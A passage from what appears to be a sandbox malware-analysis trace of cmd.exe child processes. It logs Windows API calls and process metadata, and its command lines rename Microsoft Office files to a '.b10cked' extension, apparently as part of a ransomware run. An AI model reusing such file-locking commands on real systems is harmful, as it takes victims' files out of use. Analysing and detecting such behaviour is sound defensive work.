lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x0, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x9, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x9, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x9, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegCloseKey (hKey=0x40) returned 0x0 [0158.004] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886380 [0158.004] srand (_Seed=0x5b886380) [0158.004] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"" [0158.004] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"" [0158.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.005] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.005] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.005] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.005] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.006] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.006] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.006] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.006] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.006] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.006] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.006] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.006] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.006] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.006] GetEnvironmentStringsW () returned 0x372360* [0158.006] FreeEnvironmentStringsW (penv=0x372360) returned 1 [0158.007] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.007] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.007] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.007] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.007] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.007] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.007] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.007] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.007] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.007] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.007] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f5a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.007] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f5a8, lpFilePart=0x26f5a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f5a4*="Desktop") returned 0x18 [0158.007] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.007] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f324 | out: lpFindFileData=0x26f324) returned 0x3709f0 [0158.008] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0158.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f324 | out: lpFindFileData=0x26f324) returned 0x3709f0 [0158.008] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0158.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f324 | out: lpFindFileData=0x26f324) returned 0x3709f0 [0158.008] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0158.008] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.008] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.008] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.009] GetEnvironmentStringsW () returned 0x370210* [0158.009] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0158.009] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.009] GetConsoleOutputCP () returned 0x1b5 [0158.010] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.010] GetUserDefaultLCID () returned 0x409 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6e8, cchData=128 | out: lpLCData="0") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6e8, cchData=128 | out: lpLCData="0") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6e8, cchData=128 | out: lpLCData="1") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.011] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.012] GetConsoleTitleW (in: lpConsoleTitle=0x360930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.012] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.012] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.012] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.013] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.013] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.013] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.013] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.013] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.013] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.013] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.018] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.068] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.068] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.068] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.068] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.068] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.068] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.068] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.068] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.068] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.068] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.068] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.068] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.068] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.068] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.068] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.068] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.069] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.069] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.069] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.069] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.069] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.069] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.069] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.069] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.069] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.069] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.069] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.069] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.069] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0158.069] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.069] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.069] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.069] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.069] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.069] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.070] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f19c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f194, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f194*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.071] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.072] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.072] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.072] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0158.072] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0158.072] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~2.trx")) returned 0x2020 [0158.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.072] SetErrorMode (uMode=0x0) returned 0x0 [0158.072] SetErrorMode (uMode=0x1) returned 0x0 [0158.072] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x26eb24, lpFilePart=0x26eb0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", lpFilePart=0x26eb0c*="PPINTL~2.TRX") returned 0x3c [0158.072] SetErrorMode (uMode=0x0) returned 0x1 [0158.073] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.073] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0158.073] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0158.073] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~2.trx")) returned 0x2020 [0158.073] SetErrorMode (uMode=0x0) returned 0x0 [0158.073] SetErrorMode (uMode=0x1) returned 0x0 [0158.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x26efa0, lpFilePart=0x26ed38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", lpFilePart=0x26ed38*="PPINTL~2.TRX") returned 0x3c [0158.073] SetErrorMode (uMode=0x0) returned 0x1 [0158.073] SetErrorMode (uMode=0x0) returned 0x0 [0158.073] SetErrorMode (uMode=0x1) returned 0x0 [0158.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f1a8, lpFilePart=0x26ed38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x26ed38*="PPINTL.REST.trx_dll.b10cked") returned 0x4b [0158.073] SetErrorMode (uMode=0x0) returned 0x1 [0158.074] SetLastError (dwErrCode=0x0) [0158.074] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll.b10cked")) returned 0xffffffff [0158.074] GetLastError () returned 0x2 [0158.074] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e6b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e6b4) returned 0x372130 [0158.074] FindNextFileW (in: hFindFile=0x372130, lpFindFileData=0x26e6b4 | out: lpFindFileData=0x26e6b4) returned 0 [0158.074] GetLastError () returned 0x12 [0158.074] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0158.075] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cc0) returned 0x372130 [0158.076] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0158.076] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x26e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0158.076] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll")) returned 0x2020 [0158.076] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.076] FindClose (in: hFindFile=0x372130 | out: hFindFile=0x372130) returned 1 [0158.077] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26e900 | out: _Buffer=" 1") returned 9 [0158.077] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.077] GetFileType (hFile=0x7) returned 0x2 [0158.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.077] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e88c | out: lpMode=0x26e88c) returned 1 [0158.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e8c0 | out: lpConsoleScreenBufferInfo=0x26e8c0) returned 1 [0158.079] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.079] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26e900 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.079] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26e8e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26e8e4*=0x1a) returned 1 [0158.080] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.080] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.080] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.080] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.080] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.080] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.080] SetConsoleInputExeNameW () returned 0x1 [0158.080] GetConsoleOutputCP () returned 0x1b5 [0158.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.080] exit (_Code=0) Process: id = "265" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21767 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21768 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21769 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21770 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21771 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21772 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21773 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21774 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21775 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 21776 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21801 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21802 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21803 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21804 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 21805 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 21806 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21807 start_va = 0x75540000 end_va = 